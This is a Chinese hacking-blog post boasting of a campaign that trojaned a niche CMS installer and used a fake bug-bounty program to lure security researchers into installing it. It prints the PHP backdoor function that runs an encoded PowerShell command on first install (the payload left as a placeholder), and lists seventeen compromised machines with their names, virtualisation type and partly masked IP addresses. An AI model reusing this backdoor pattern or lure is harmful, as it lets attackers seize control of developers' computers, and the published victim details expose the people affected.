记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

实战获取大量Hacker PC权限的难度到底有多低?

2020-11-21 19:28

人有多大胆,思路多大产,不鸣则已,一鸣惊人!


关注我们,带你了解最新的思路!




曾经发表过一篇文章《从网站入侵到服务器再到窃听监控管理员PC电脑》该文章结合了Flash+XSS的完美钓鱼手法,一经发布就达到了6000+阅读量,随后各类大佬的Flash+XSS钓鱼文章层出不穷,有完善了手法的,也有照搬的,在做各类电诈项目中也遇到了至少4-5次同行的鱼站,这让我尤为开心,没想到自己有一天能给大佬提供思路,真他娘的棒棒哒。期间微信公众号也发表过一些广告,在这里就给大家一个补偿,谈谈如何通过社会工程获取黑客PC权限的难度有多低?

开始

审计源码是各类黑客大佬的常规操作,大部分人基本都是怎么方便怎么来,比如:


多莫熟悉的流程呀,哈哈哈。在这里我们将一段代码植入到CMS 安装程序界面:

function CheckInstall(){    #PHP命令检查    if(!function_exists("exec")) die('PHP Exec函数被关闭,请开启该函数以正常安装源码.'); #检查Exec函数是否启用    if(file_exists("install.lck")){ echo ''; } else { exec("powershell -ENC 命令");file_put_contents("install.lck","Ok");}     #执行前判断当前目录是否拥有install.lck文件以判断是否为第一次执行,防止每次执行,导致打开页面缓慢.}

具体原理我已经注释在代码后方。这段源码其实也比较简单,通过PHP exec 执行powershell然后解码-enc的代码,从而执行任意的一个操作。

是否觉得这不是很白痴?这不就是个后门?跟获取黑客电脑有何关系?

审计源码是否会搭建到黑客的本机?Or 黑客的虚拟机?

想到了?哈哈。

当黑客审计一下,然后自己的PC或者虚拟机就上线了?然后直入黑客的内网之中?

思路衍生

诈骗分子的技术支撑者(搭建犯罪网站)这些人我们是不是可以告诉他们,帮我看看源码?能否改动?我给你5w块?当他接收了源码,这些人一般不会使用虚拟机,那么是不是 是不是?哈哈哈

实战获取黑客PC权限

首先举办一次挖洞相关的任务项目,挖掘项目就是一款市面上面并非太常见的小众类型CMS,我们通过在CMS中种植木马,接着将奖励设为:中危 1000 高危 3000 的高额奖励水平,以来激励大家踊跃挖掘。

通过上面的铺垫,我们只获取了用户的PC电脑名称,以及系统型号,得到了如下数据:

计算机名称:WIN-SMJ8H9BQ778 -- 是否虚拟机:VMware Virtual Platform -- IP地址:36.**.112.80
计算机名称:DESKTOP-Q53998I -- 是否虚拟机:VMware7,1 -- IP地址:182.**.238.0
计算机名称:LAPTOP-HOGGKO0D -- 是否虚拟机:81T0 -- IP地址:112.**.145.226
计算机名称:172_27_0_11 -- 是否虚拟机:KVM -- IP地址:139.155.2**.39
计算机名称:WIN-G69EV7LJ62K -- 是否虚拟机:VMware Virtual Platform -- IP地址:112.**.145.226
计算机名称:AMIND-PC -- 是否虚拟机:VirtualBox -- IP地址:101.25.**.234
计算机名称:INSTANCE-PNDRY0 -- 是否虚拟机:Baidu Cloud BCC -- IP地址:106.**.211.88
计算机名称:FARMSEC-PC -- 是否虚拟机:VirtualBox -- IP地址:101.25.**.234
计算机名称:uxZAhG1001869 -- 是否虚拟机:Virtual Machine -- IP地址:103.45.**.56
计算机名称:DESKTOP-P7M96TF -- 是否虚拟机:NH50_70RA -- IP地址:1.198.**.67
计算机名称:911-AIR -- 是否虚拟机:911Air -- IP地址:113.12.**.33
计算机名称:iZooi5lub11a76Z -- 是否虚拟机:Alibaba Cloud ECS -- IP地址:101.201.**.237
计算机名称:DESKTOP-42UHDJ3 -- 是否虚拟机:Dino -- IP地址:220.189.**.169
计算机名称:WIN-PFGGD04LTTR -- 是否虚拟机:VMware Virtual Platform -- IP地址:110.167.2**.73
计算机名称:iZ7c05yy76kk51Z -- 是否虚拟机:Alibaba Cloud ECS -- IP地址:101.200.1**.106
计算机名称:AMIND-PC -- 是否虚拟机:VirtualBox -- IP地址:110.253.2**.208
计算机名称:DESKTOP-T7GJSKA -- 是否虚拟机:VMware7,1 -- IP地址:101.224.**.212

在第一天就有17台PC电脑上线,其中云服务器:3台 ,虚拟机:9台 ,其余的都为物理机器,对于这个成果我个人觉得并非太理想,看来各位黑客还是经受住了此次考验,并没有直接就放到物理机中运行。棒棒哒!!!

黑客都能上线那么多?那么?你懂的!@那些给诈骗提供帮助的技术人员们,颤抖把!


广告 广告 广告


【白嫖乃王道】诚殷网络第【3】期逐梦计划招生


知识来源: https://mp.weixin.qq.com/s?__biz=MzU3MzE2ODAyNA==&mid=2247484308&idx=1&sn=6dd019ee48e10f9ceb4b8fad29d85284&chksm=fcc48363cbb30a75439542e53b9a73e7cd6638ad5369054c3433900be33fa5a6e6de5723eb72&scene=0&xt

阅读:6060 | 评论:0 | 标签:hack

想收藏或者和大家分享这篇好文章→复制链接地址

“实战获取大量Hacker PC权限的难度到底有多低?”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云